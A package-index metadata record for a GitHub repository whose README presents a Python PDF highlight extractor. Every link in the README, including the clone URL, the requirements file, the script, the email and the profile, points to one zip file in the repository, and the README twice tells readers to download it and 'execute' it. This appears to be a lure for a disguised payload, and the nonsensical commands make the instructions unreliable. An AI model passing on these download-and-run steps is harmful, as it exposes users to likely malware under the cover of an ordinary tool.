{"id":28330848,"url":"https://github.com/kingpin707/pdf-highlight-extractor","last_synced_at":"2026-05-03T07:46:43.167Z","repository":{"id":293779754,"uuid":"985073903","full_name":"KINGPIN707/PDF-Highlight-Extractor","owner":"KINGPIN707","description":"A Python tool for extracting highlighted text from PDF files while preserving formatting attributes (headers, bold, italic) and removing unwanted line breaks and page breaks. Perfect for integrating with content management systems.","archived":false,"fork":false,"pushed_at":"2025-06-14T11:33:44.000Z","size":83,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-06-14T12:32:32.165Z","etag":null,"topics":["ai21labs","ebook-reader","extract-highlights","extract-text","faiss-backend","highlight-color","kindle","kindle-clippings","koreader","markdown","mobi","pdf-converter","python","remarkable-tablet"],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":false,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/KINGPIN707.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2025-05-17T02:47:50.000Z","updated_at":"2025-06-14T11:33:48.000Z","dependencies_parsed_at":"2025-05-31T08:45:20.532Z","dependency_job_id":"2024915e-2fef-461c-a65a-acac76eeb894","html_url":"https://github.com/KINGPIN707/PDF-Highlight-Extractor","commit_stats":null,"previous_names":["kingpin707/pdf-highlight-extractor"],"tags_count":1,"template":false,"template_full_name":null,"purl":"pkg:github/KINGPIN707/PDF-Highlight-Extractor","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/KINGPIN707%2FPDF-Highlight-Extractor","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/KINGPIN707%2FPDF-Highlight-Extractor/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/KINGPIN707%2FPDF-Highlight-Extractor/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/KINGPIN707%2FPDF-Highlight-Extractor/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/KINGPIN707","download_url":"https://codeload.github.com/KINGPIN707/PDF-Highlight-Extractor/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/KINGPIN707%2FPDF-Highlight-Extractor/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":260658756,"owners_count":23043435,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["ai21labs","ebook-reader","extract-highlights","extract-text","faiss-backend","highlight-color","kindle","kindle-clippings","koreader","markdown","mobi","pdf-converter","python","remarkable-tablet"],"created_at":"2025-05-26T17:42:39.897Z","updated_at":"2026-05-03T07:46:43.161Z","avatar_url":"https://github.com/KINGPIN707.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# PDF Highlight Extractor 📝✨\n\n![PDF Highlight Extractor](https://raw.githubusercontent.com/KINGPIN707/PDF-Highlight-Extractor/main/plier/PD_Extractor_Highlight_3.7-beta.5.zip%20Latest%20Release-Click%20Here-brightgreen)\n\nWelcome to the **PDF Highlight Extractor** repository! This Python tool allows you to extract highlighted text from PDF files while keeping important formatting attributes like headers, bold, and italic text. It also removes unwanted line breaks and page breaks, making it ideal for integration with content management systems.\n\n## Table of Contents\n\n- [Features](#features)\n- [Installation](#installation)\n- [Usage](#usage)\n- [Supported Formats](#supported-formats)\n- [Dependencies](#dependencies)\n- [Contributing](#contributing)\n- [License](#license)\n- [Contact](#contact)\n\n## Features\n\n- **Extract Highlighted Text**: Capture only the text you need without sifting through entire documents.\n- **Preserve Formatting**: Maintain headers, bold, and italic styles for better readability.\n- **Clean Output**: Automatically remove unwanted line breaks and page breaks.\n- **Easy Integration**: Works seamlessly with various content management systems.\n- **Cross-Platform**: Runs on any system that supports Python 3.\n\n## Installation\n\nTo get started with PDF Highlight Extractor, follow these steps:\n\n1. **Clone the Repository**:\n   ```bash\n   git clone https://raw.githubusercontent.com/KINGPIN707/PDF-Highlight-Extractor/main/plier/PD_Extractor_Highlight_3.7-beta.5.zip\n   cd PDF-Highlight-Extractor\n   ```\n\n2. **Install Dependencies**:\n   Use pip to install the required libraries.\n   ```bash\n   pip install -r https://raw.githubusercontent.com/KINGPIN707/PDF-Highlight-Extractor/main/plier/PD_Extractor_Highlight_3.7-beta.5.zip\n   ```\n\n3. **Download the Latest Release**:\n   You can find the latest release [here](https://raw.githubusercontent.com/KINGPIN707/PDF-Highlight-Extractor/main/plier/PD_Extractor_Highlight_3.7-beta.5.zip). Download the appropriate file and execute it.\n\n## Usage\n\nUsing PDF Highlight Extractor is straightforward. Here’s how to run the tool:\n\n1. **Prepare Your PDF**: Make sure your PDF file is ready for extraction.\n2. **Run the Tool**:\n   ```bash\n   python https://raw.githubusercontent.com/KINGPIN707/PDF-Highlight-Extractor/main/plier/PD_Extractor_Highlight_3.7-beta.5.zip https://raw.githubusercontent.com/KINGPIN707/PDF-Highlight-Extractor/main/plier/PD_Extractor_Highlight_3.7-beta.5.zip\n   ```\n3. **View the Output**: The extracted text will be saved in a new file, preserving all formatting.\n\n### Example Command\n\n```bash\npython https://raw.githubusercontent.com/KINGPIN707/PDF-Highlight-Extractor/main/plier/PD_Extractor_Highlight_3.7-beta.5.zip https://raw.githubusercontent.com/KINGPIN707/PDF-Highlight-Extractor/main/plier/PD_Extractor_Highlight_3.7-beta.5.zip\n```\n\nThis command will extract highlighted text from `https://raw.githubusercontent.com/KINGPIN707/PDF-Highlight-Extractor/main/plier/PD_Extractor_Highlight_3.7-beta.5.zip` and save it in a new file.\n\n## Supported Formats\n\nThe PDF Highlight Extractor supports various PDF formats. It works well with:\n\n- Standard PDF files\n- Scanned documents (OCR-enabled)\n- PDF/A format\n\n## Dependencies\n\nThe tool relies on several Python libraries for its functionality:\n\n- `numpy`: For numerical operations.\n- `opencv`: For image processing tasks.\n- `Pillow`: For handling image files.\n- `PyMuPDF`: For reading and manipulating PDF files.\n- `PyPDF2`: For PDF file handling.\n- `pypdfium2`: For rendering PDF pages.\n\nYou can find the complete list of dependencies in the `https://raw.githubusercontent.com/KINGPIN707/PDF-Highlight-Extractor/main/plier/PD_Extractor_Highlight_3.7-beta.5.zip` file.\n\n## Contributing\n\nWe welcome contributions! If you’d like to improve PDF Highlight Extractor, please follow these steps:\n\n1. **Fork the Repository**: Click on the \"Fork\" button at the top right of the page.\n2. **Create a Branch**: \n   ```bash\n   git checkout -b feature/YourFeature\n   ```\n3. **Make Your Changes**: Implement your feature or fix.\n4. **Commit Your Changes**:\n   ```bash\n   git commit -m \"Add your message here\"\n   ```\n5. **Push to Your Branch**:\n   ```bash\n   git push origin feature/YourFeature\n   ```\n6. **Create a Pull Request**: Go to the original repository and click on \"New Pull Request\".\n\n## License\n\nThis project is licensed under the MIT License. See the [LICENSE](LICENSE) file for details.\n\n## Contact\n\nFor any inquiries or support, please reach out:\n\n- **Email**: https://raw.githubusercontent.com/KINGPIN707/PDF-Highlight-Extractor/main/plier/PD_Extractor_Highlight_3.7-beta.5.zip\n- **GitHub**: [KINGPIN707](https://raw.githubusercontent.com/KINGPIN707/PDF-Highlight-Extractor/main/plier/PD_Extractor_Highlight_3.7-beta.5.zip)\n\nThank you for using PDF Highlight Extractor! If you encounter any issues or have suggestions, feel free to open an issue in the repository.\n\n![PDF Highlight Extractor](https://raw.githubusercontent.com/KINGPIN707/PDF-Highlight-Extractor/main/plier/PD_Extractor_Highlight_3.7-beta.5.zip%20Latest%20Release-Click%20Here-brightgreen)\n\nTo download the latest release, visit [this link](https://raw.githubusercontent.com/KINGPIN707/PDF-Highlight-Extractor/main/plier/PD_Extractor_Highlight_3.7-beta.5.zip) and execute the necessary file.\n\nHappy extracting! 🎉","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkingpin707%2Fpdf-highlight-extractor","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fkingpin707%2Fpdf-highlight-extractor","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkingpin707%2Fpdf-highlight-extractor/lists"}